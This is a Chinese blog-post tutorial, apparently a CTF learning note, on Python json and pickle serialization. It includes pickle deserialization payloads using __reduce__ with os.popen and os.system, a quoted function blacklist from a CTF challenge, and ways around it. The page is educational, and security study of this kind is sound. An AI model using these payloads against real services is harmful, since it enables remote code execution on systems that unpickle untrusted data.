<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="阿巴">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/12/08/python反序列化/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="python反序列化此类序列化与反序列化与php的反序列化较为相似，相当于把程序运行时产生的变量，字典，对象实例等变换成字符串形式存储起来，以便后续调用，恢复保存前的状态 python中反序列化的库主要有两个，pickle和cPickle，这俩除了运行效率上有区别外，其他没啥区别 #序列化 import pickle a_list &#x3D; [&#39;a&#39;,&#39;b&#39;,&#39;c&#39;] print(pickle.dump">
<meta property="og:type" content="article">
<meta property="og:title" content="阿巴">
<meta property="og:url" content="http://example.com/2023/12/08/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/index.html">
<meta property="og:site_name" content="阿巴">
<meta property="og:description" content="python反序列化此类序列化与反序列化与php的反序列化较为相似，相当于把程序运行时产生的变量，字典，对象实例等变换成字符串形式存储起来，以便后续调用，恢复保存前的状态 python中反序列化的库主要有两个，pickle和cPickle，这俩除了运行效率上有区别外，其他没啥区别 #序列化 import pickle a_list &#x3D; [&#39;a&#39;,&#39;b&#39;,&#39;c&#39;] print(pickle.dump">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/source/images/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/json%E8%BD%AC%E6%8D%A2%E8%A1%A8.png">
<meta property="og:image" content="http://example.com/source/images/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/R%E8%BF%87%E6%BB%A4.png">
<meta property="article:published_time" content="2023-12-08T06:45:23.604Z">
<meta property="article:modified_time" content="2023-09-08T12:07:30.639Z">
<meta property="article:author" content="阿巴">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/source/images/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/json%E8%BD%AC%E6%8D%A2%E8%A1%A8.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/8d.png@1256w_1256h_!web-article-pic.webp" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/8d.png@1256w_1256h_!web-article-pic.webp">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/8d.png@1256w_1256h_!web-article-pic.webp">
    <!--- Page Info-->
    
    <title>
        
        阿巴
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/e6d1c777bb54674dd5cc6ed2c6147596a899ed7b.jpg@1256w_708h_!web-article-pic.webp","dark":"/images/688bff5fab134b2da7d52ca53163372d39812ec8.jpg@1256w_708h_!web-article-pic.webp"},"title":"阿巴的小站","subtitle":{"text":[],"hitokoto":{"enable":true,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"links":{"github":"https://github.com/621779","instagram":"https://www.instagram.com/","zhihu":"https://www.zhihu.com/people/zhi-chu-85-7","twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.2","navbar":{"auto_hide":true,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":"如果讨厌当前的处境，那就不惜一切代价上去，然后去追随梦想吧！","links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/12/11  12：00：00"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                阿巴
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                
                  <h1 class="article-title-regular"></h1>
                
              </div>
              
                     
            
            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/49871906.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">阿巴</span>
                            
                                <span class="author-label">Lv4</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-12-08 14:45:23</span>
        <span class="mobile">2023-12-08 14:45:23</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-09-08 20:07:30</span>
            <span class="mobile">2023-09-08 20:07:30</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h1 id="python反序列化"><a href="#python反序列化" class="headerlink" title="python反序列化"></a>python反序列化</h1><p>此类序列化与反序列化与php的反序列化较为相似，相当于把程序运行时产生的变量，字典，对象实例等变换成字符串形式存储起来，以便后续调用，恢复保存前的状态</p>
<p>python中反序列化的库主要有两个，<code>pickle</code>和<code>cPickle</code>，这俩除了运行效率上有区别外，其他没啥区别</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token comment">#序列化</span>
<span class="token keyword">import</span> pickle
a_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'a'</span><span class="token punctuation">,</span><span class="token string">'b'</span><span class="token punctuation">,</span><span class="token string">'c'</span><span class="token punctuation">]</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>a_list<span class="token punctuation">,</span>protocol<span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token comment">#运行结果：b'(lp0\nVa\np1\naVb\np2\naVc\np3\na.'</span>


<span class="token comment">#反序列化</span>
<span class="token keyword">import</span> pickle
a_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token string">'a'</span><span class="token punctuation">,</span><span class="token string">'b'</span><span class="token punctuation">,</span><span class="token string">'c'</span><span class="token punctuation">]</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>pickle<span class="token punctuation">.</span>loads<span class="token punctuation">(</span><span class="token string">b'(lp0\nVa\np1\naVb\np2\naVc\np3\na.'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token comment">#运行结果：['a','b','c']</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h2 id="序列化方式"><a href="#序列化方式" class="headerlink" title="序列化方式"></a>序列化方式</h2><h3 id="json格式"><a href="#json格式" class="headerlink" title="json格式"></a>json格式</h3><h4 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h4><p>JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，易于阅读和编写，同时也易于机器解析和生成。JSON采用完全独立于编程语言的文本格式，这使得JSON成为理想的数据交换语言。JSON的基本结构是由键值对（key-value pairs）组成的对象（object）和数组（array）。</p>
<p>如果我们要在不同的编程语言之间传递对象，就必须把对象序列化为标准格式，比如XML，但更好的方法是序列化为JSON。因为JSON表示出来就是一个字符串，可以被所有语言读取，也可以方便地存储到磁盘或者通过网络传输。JSON不仅是标准格式，并且比XML更快，而且可以直接在Web页面中读取，非常方便。</p>
<p><strong>JSON的两种结构</strong></p>
<p>1、 “名称&#x2F;值”对的集合（A collection of name&#x2F;value pairs）</p>
<p>不同的编程语言中，它被理解为对象（object），纪录（record），结构（struct），字典（dictionary），哈希表（hash table），有键列表（keyed list），或者关联数组 （associative array）。</p>
<p>2、 值的有序列表（An ordered list of values）</p>
<p>在大部分语言中，它被实现为数组（array），矢量（vector），列表（list），序列（sequence）。</p>
<p><strong>格式转换表</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../../../source/images/python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/json%E8%BD%AC%E6%8D%A2%E8%A1%A8.png"
                     
                ></p>
<h4 id="dump、dumps和load、loads"><a href="#dump、dumps和load、loads" class="headerlink" title="dump、dumps和load、loads"></a>dump、dumps和load、loads</h4><p>在此种反序列化方法中，前二者表示对其进行序列化，后二者表示反序列化，下面对其进行简单的代码实现。</p>
<p><strong>dump与dumps</strong></p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> json

<span class="token comment"># dumps可以格式化所有的基本数据类型为字符串</span>
data1 <span class="token operator">=</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">)</span>         <span class="token comment"># 列表</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>data1<span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token punctuation">(</span>data1<span class="token punctuation">)</span><span class="token punctuation">)</span>
data2 <span class="token operator">=</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span>          <span class="token comment"># 数字</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>data2<span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token punctuation">(</span>data2<span class="token punctuation">)</span><span class="token punctuation">)</span>
data3 <span class="token operator">=</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token string">'3'</span><span class="token punctuation">)</span>        <span class="token comment"># 字符串</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>data3<span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token punctuation">(</span>data3<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token builtin">dict</span> <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token string">"name"</span><span class="token punctuation">:</span> <span class="token string">"Tom"</span><span class="token punctuation">,</span> <span class="token string">"age"</span><span class="token punctuation">:</span> <span class="token number">18</span><span class="token punctuation">&#125;</span>   <span class="token comment"># 字典</span>
data4 <span class="token operator">=</span> json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token builtin">dict</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>data4<span class="token punctuation">,</span> <span class="token builtin">type</span><span class="token punctuation">(</span>data4<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"test.json"</span><span class="token punctuation">,</span> <span class="token string">"w"</span><span class="token punctuation">,</span> encoding<span class="token operator">=</span><span class="token string">'utf-8'</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
    <span class="token comment"># indent 格式化保存字典，默认为None，小于0为零个空格。indent=4缩进4个空格</span>
    f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>json<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span><span class="token builtin">dict</span><span class="token punctuation">,</span> indent<span class="token operator">=</span><span class="token number">4</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
    json<span class="token punctuation">.</span>dump<span class="token punctuation">(</span><span class="token builtin">dict</span><span class="token punctuation">,</span> f<span class="token punctuation">,</span> indent<span class="token operator">=</span><span class="token number">4</span><span class="token punctuation">)</span>  <span class="token comment"># 传入文件描述符，和dumps一样的结果</span>
    
<span class="token comment">#json文件当中的内容：</span>
<span class="token comment">#&#123;</span>
<span class="token comment">#    "name": "Tom",</span>
<span class="token comment">#    "age": 18</span>
<span class="token comment">#&#125;&#123;</span>
<span class="token comment">#    "name": "Tom",</span>
<span class="token comment">#    "age": 18</span>
<span class="token comment">#&#125;</span>
<span class="token comment">#输出的结果：</span>
<span class="token comment">#[] &lt;class 'str'></span>
<span class="token comment">#2 &lt;class 'str'></span>
<span class="token comment">#"3" &lt;class 'str'></span>
<span class="token comment">#&#123;"name": "Tom", "age": 18&#125; &lt;class 'str'></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看出，在序列化之后的符号全是字符型，但都没有符号的变化，可以用于json的数据传输。</p>
<p>load和loads</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> json


data5 <span class="token operator">=</span> json<span class="token punctuation">.</span>loads<span class="token punctuation">(</span><span class="token string">'&#123;"name": "Tom", "age": 18&#125;'</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>data5<span class="token punctuation">,</span><span class="token builtin">type</span><span class="token punctuation">(</span>data5<span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token comment">#运行结果：&#123;'name': 'Tom', 'age': 18&#125; &lt;class 'dict'></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>可以看到，在经过序列化之后，他值得类型为字符，在反序列化之后，他的类型变为了字典。类型改变之后，便可以变回他原本的含义。</p>
<p>注意：<strong>json模块只能序列化基本的数据类型，如字符串、数字、列表和字典等</strong></p>
<p>详细讲解见：<a class="link"   target="_blank" rel="noopener" href="https://blog.csdn.net/Hardworking666/article/details/112725423" >Python序列化与反序列化详解（包括json和json模块详解）_Hardworking666的博客-CSDN博客 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h3 id="pickle格式"><a href="#pickle格式" class="headerlink" title="pickle格式"></a>pickle格式</h3><p>此格式与上述格式不同，在序列化之后会进行二进制序列化格式化，函数也是用dump、load。</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span>  os
<span class="token keyword">import</span>  pickle
<span class="token keyword">import</span> base64
<span class="token keyword">class</span> <span class="token class-name">CTF</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span><span class="token punctuation">(</span>os<span class="token punctuation">.</span>popen<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token string">"calc"</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
ctf <span class="token operator">=</span> CTF<span class="token punctuation">(</span><span class="token punctuation">)</span>

bc <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>ctf<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>bc<span class="token punctuation">)</span>
<span class="token comment">#运行结果如下：b'\x80\x04\x95\x1b\x00\x00\x00\x00\x00\x00\x00\x8c\x02os\x94\x8c\x05popen\x94\x93\x94\x8c\x04calc\x94\x85\x94R\x94.'</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在运行之后会将结果进行二进制转换，便于传输，上面的例子在反序列化之后会触发计算器，常用于检测代码是否会触发反序列化漏洞。</p>
<h3 id="常用的命令执行的方法"><a href="#常用的命令执行的方法" class="headerlink" title="常用的命令执行的方法"></a>常用的命令执行的方法</h3><h3 id="reduce-方法"><a href="#reduce-方法" class="headerlink" title="__reduce__方法"></a><code>__reduce__</code>方法</h3><p>当定义扩展类型时（也就是使用Python的C语言API实现的类型），如果你想pickle它们，你必须告诉Python如何pickle它们。 <strong>reduce</strong> 被定义之后，当对象被Pickle时就会被调用。它要么返回一个代表全局名称的字符串，Pyhton会查找它并pickle，要么返回一个元组。这个元组包含2到5个元素，其中包括：一个可调用的对象，用于重建对象时调用；一个参数元素，供那个可调用对象使用；被传递给 <strong>setstate</strong> 的状态（可选）；一个产生被pickle的列表元素的迭代器（可选）；一个产生被pickle的字典元素的迭代器。</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span>  os
<span class="token keyword">import</span>  pickle
<span class="token keyword">import</span> base64
<span class="token keyword">class</span> <span class="token class-name">CTF</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
        <span class="token keyword">return</span><span class="token punctuation">(</span>os<span class="token punctuation">.</span>popen<span class="token punctuation">,</span><span class="token punctuation">(</span><span class="token string">"calc"</span><span class="token punctuation">,</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
ctf <span class="token operator">=</span> CTF<span class="token punctuation">(</span><span class="token punctuation">)</span>

bc <span class="token operator">=</span> pickle<span class="token punctuation">.</span>dumps<span class="token punctuation">(</span>ctf<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>bc<span class="token punctuation">)</span>
<span class="token comment">#运行结果如下：b'\x80\x04\x95\x1b\x00\x00\x00\x00\x00\x00\x00\x8c\x02os\x94\x8c\x05popen\x94\x93\x94\x8c\x04calc\x94\x85\x94R\x94.'</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>在反序列话之后会执行<code>__reduce__</code>中的方法，便可以执行其中的方法。</p>
<p><strong>黑名单绕过</strong>：</p>
<p>在部分过滤中，会对reduce中执行的内容进行过滤，但又没有过滤R指令码，以2018-XCTF-HITB-WEB : Python’s-Revenge为例。给了好长好长一串黑名单：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python">black_type_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token builtin">eval</span><span class="token punctuation">,</span> <span class="token builtin">execfile</span><span class="token punctuation">,</span> <span class="token builtin">compile</span><span class="token punctuation">,</span> <span class="token builtin">open</span><span class="token punctuation">,</span> <span class="token builtin">file</span><span class="token punctuation">,</span> os<span class="token punctuation">.</span>system<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen2<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen3<span class="token punctuation">,</span> os<span class="token punctuation">.</span>popen4<span class="token punctuation">,</span> os<span class="token punctuation">.</span>fdopen<span class="token punctuation">,</span> os<span class="token punctuation">.</span>tmpfile<span class="token punctuation">,</span> os<span class="token punctuation">.</span>fchmod<span class="token punctuation">,</span> os<span class="token punctuation">.</span>fchown<span class="token punctuation">,</span> os<span class="token punctuation">.</span><span class="token builtin">open</span><span class="token punctuation">,</span> os<span class="token punctuation">.</span>openpty<span class="token punctuation">,</span> os<span class="token punctuation">.</span>read<span class="token punctuation">,</span> os<span class="token punctuation">.</span>pipe<span class="token punctuation">,</span> os<span class="token punctuation">.</span>chdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>fchdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>chroot<span class="token punctuation">,</span> os<span class="token punctuation">.</span>chmod<span class="token punctuation">,</span> os<span class="token punctuation">.</span>chown<span class="token punctuation">,</span> os<span class="token punctuation">.</span>link<span class="token punctuation">,</span> os<span class="token punctuation">.</span>lchown<span class="token punctuation">,</span> os<span class="token punctuation">.</span>listdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>lstat<span class="token punctuation">,</span> os<span class="token punctuation">.</span>mkfifo<span class="token punctuation">,</span> os<span class="token punctuation">.</span>mknod<span class="token punctuation">,</span> os<span class="token punctuation">.</span>access<span class="token punctuation">,</span> os<span class="token punctuation">.</span>mkdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>makedirs<span class="token punctuation">,</span> os<span class="token punctuation">.</span>readlink<span class="token punctuation">,</span> os<span class="token punctuation">.</span>remove<span class="token punctuation">,</span> os<span class="token punctuation">.</span>removedirs<span class="token punctuation">,</span> os<span class="token punctuation">.</span>rename<span class="token punctuation">,</span> os<span class="token punctuation">.</span>renames<span class="token punctuation">,</span> os<span class="token punctuation">.</span>rmdir<span class="token punctuation">,</span> os<span class="token punctuation">.</span>tempnam<span class="token punctuation">,</span> os<span class="token punctuation">.</span>tmpnam<span class="token punctuation">,</span> os<span class="token punctuation">.</span>unlink<span class="token punctuation">,</span> os<span class="token punctuation">.</span>walk<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execl<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execle<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execlp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execv<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execve<span class="token punctuation">,</span> os<span class="token punctuation">.</span>dup<span class="token punctuation">,</span> os<span class="token punctuation">.</span>dup2<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execvp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>execvpe<span class="token punctuation">,</span> os<span class="token punctuation">.</span>fork<span class="token punctuation">,</span> os<span class="token punctuation">.</span>forkpty<span class="token punctuation">,</span> os<span class="token punctuation">.</span>kill<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnl<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnle<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnlp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnlpe<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnv<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnve<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnvp<span class="token punctuation">,</span> os<span class="token punctuation">.</span>spawnvpe<span class="token punctuation">,</span> pickle<span class="token punctuation">.</span>load<span class="token punctuation">,</span> pickle<span class="token punctuation">.</span>loads<span class="token punctuation">,</span> cPickle<span class="token punctuation">.</span>load<span class="token punctuation">,</span> cPickle<span class="token punctuation">.</span>loads<span class="token punctuation">,</span> subprocess<span class="token punctuation">.</span>call<span class="token punctuation">,</span> subprocess<span class="token punctuation">.</span>check_call<span class="token punctuation">,</span> subprocess<span class="token punctuation">.</span>check_output<span class="token punctuation">,</span> subprocess<span class="token punctuation">.</span>Popen<span class="token punctuation">,</span> commands<span class="token punctuation">.</span>getstatusoutput<span class="token punctuation">,</span> commands<span class="token punctuation">.</span>getoutput<span class="token punctuation">,</span> commands<span class="token punctuation">.</span>getstatus<span class="token punctuation">,</span> glob<span class="token punctuation">.</span>glob<span class="token punctuation">,</span> linecache<span class="token punctuation">.</span>getline<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>copyfileobj<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>copyfile<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>copy<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>copy2<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>move<span class="token punctuation">,</span> shutil<span class="token punctuation">.</span>make_archive<span class="token punctuation">,</span> dircache<span class="token punctuation">.</span>listdir<span class="token punctuation">,</span> dircache<span class="token punctuation">.</span>opendir<span class="token punctuation">,</span> io<span class="token punctuation">.</span><span class="token builtin">open</span><span class="token punctuation">,</span> popen2<span class="token punctuation">.</span>popen2<span class="token punctuation">,</span> popen2<span class="token punctuation">.</span>popen3<span class="token punctuation">,</span> popen2<span class="token punctuation">.</span>popen4<span class="token punctuation">,</span> timeit<span class="token punctuation">.</span>timeit<span class="token punctuation">,</span> timeit<span class="token punctuation">.</span>repeat<span class="token punctuation">,</span> sys<span class="token punctuation">.</span>call_tracing<span class="token punctuation">,</span> code<span class="token punctuation">.</span>interact<span class="token punctuation">,</span> code<span class="token punctuation">.</span>compile_command<span class="token punctuation">,</span> codeop<span class="token punctuation">.</span>compile_command<span class="token punctuation">,</span> pty<span class="token punctuation">.</span>spawn<span class="token punctuation">,</span> posixfile<span class="token punctuation">.</span><span class="token builtin">open</span><span class="token punctuation">,</span> posixfile<span class="token punctuation">.</span>fileopen<span class="token punctuation">]</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>可惜<code>platform.popen()</code>不在名单里，它可以做到类似<code>system</code>的功能，便能执行命令。</p>
<p>还有另一个题解，便是利用map来进行构造题解：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">class</span> <span class="token class-name">Exploit</span><span class="token punctuation">(</span><span class="token builtin">object</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">def</span> <span class="token function">__reduce__</span><span class="token punctuation">(</span>self<span class="token punctuation">)</span><span class="token punctuation">:</span>
 	<span class="token keyword">return</span> <span class="token builtin">map</span><span class="token punctuation">,</span><span class="token punctuation">(</span>os<span class="token punctuation">.</span>system<span class="token punctuation">,</span><span class="token punctuation">[</span><span class="token string">"ls"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>map的用法：</p>
<p><strong>map()</strong> 会根据提供的函数对指定序列做映射。第一个参数 function 以参数序列中的每一个元素调用 function 函数，返回包含每次 function 函数返回值的新列表。</p>
<p>如下例：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token operator">>></span><span class="token operator">></span> <span class="token keyword">def</span> <span class="token function">square</span><span class="token punctuation">(</span>x<span class="token punctuation">)</span> <span class="token punctuation">:</span>            <span class="token comment"># 计算平方数</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>     <span class="token keyword">return</span> x <span class="token operator">**</span> <span class="token number">2</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
